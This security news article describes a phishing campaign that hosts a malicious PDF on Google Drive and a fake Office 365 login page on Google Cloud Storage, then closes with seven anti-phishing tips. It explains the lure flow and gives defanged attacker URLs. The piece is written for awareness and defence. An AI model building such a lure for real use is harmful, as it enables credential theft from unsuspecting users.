Office 365 Phishing Scam Leverages Google Cloud Services

Credential Phishing campaign uses Google Cloud Services to steal Office 365 logins

The threat actors are using cloud services to phish Microsoft Office 365 passwords. Cloud services like Google Drive were user to host a malicious PDF document while Google’s “storage.googleapis[.]com” hosted the credential phishing page.

This credential phishing scam uses a malicious pdf document that has been uploaded to Google Drive.  The pdf file prompts the reader to click on a link to gain access to the document. The “Access Document” link sends the victim to a phishing page hosted in Google Cloud Platform (httpx://storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html)  After the page loads, it prompts the reader to log in using one of two options.

The victim is prompted to choose either “Sign in with Office 365” or “Sign in with organization ID”. Regardless of which option is chosen a window pops up and prompts the reader for their Microsoft Outlook username and password.  Cyber security researchers at Check Point described this tactic in a report.

READ: Microsoft Reports Massive Office 365 Phishing Campaign

After the credentials are entered, the victim’s information is sent to the threat actors and their MS Office account is compromised. However, to again reduce suspicion, the reader redirected to a legitimate PDF report published by a consulting firm.

“During all of these stages, the user never gets suspicious since the phishing page is hosted on Google Cloud Storage. However, viewing the phishing page’s source code has revealed that most of the resources are loaded from a website that belongs to the attackers, prvtsmtp[.]com” says the report.

Threat actors leverage well-known cloud services to increase the success of their scams. Although this Phishing campaign uses Google cloud to host a malicious document any cloud service could have been used. The goal is to bypass spam email and malware filters and instill trust in the reader. Cloud-based file storage sites like iCloud, Microsoft Azure, and Dropbox can all be used  by threat actors in this type of cyber attack.

How to protect against phishing

1. Always scrutinize the sender of any email, even if they seem familiar. Threat actors use domain names that are closely named for legitimate, well-known companies and services. Often the sender’s email address is off by only one letter.
2. Be sure to use a unique password for each online account you have. A password vault can help you remember them. Attackers can gain access to a low-level account (social media) and then use that password to hack their way into more valuable accounts like bank accounts and credit cards.
3. Use an antivirus program to scan emails and alert you to suspicious senders, links, websites,  and email attachments.
4. Be highly suspicious of any email that prompts you to act immediately, even if it’s from a service you do business with. Threat actors brand emails to look just like global well-known companies like Chase Bank and Microsoft Office to trick readers into following links in the scams.
5. Think before you act. Threat actors craft the wording in a phishing email in hopes that the reader acts without thinking or scrutinizing the email and the links it contains. Take a minute to look carefully at the contents of all emails before you respond.
6. Be wary of any links in emails especially if they’re asking you to reset a password or go to a website to avoid some sort of negative action. Often these links in phishing emails are cloaked or shortened to disguise the identity of the website they lead to.
7. Be suspicious of any email that contains an attachment that you were not expecting  – even if the email appears to come from somebody you think you know. Call them and verify that they sent you an email with attachments before opening or downloading. Documents attached to emails can contain malware or links to malicious websites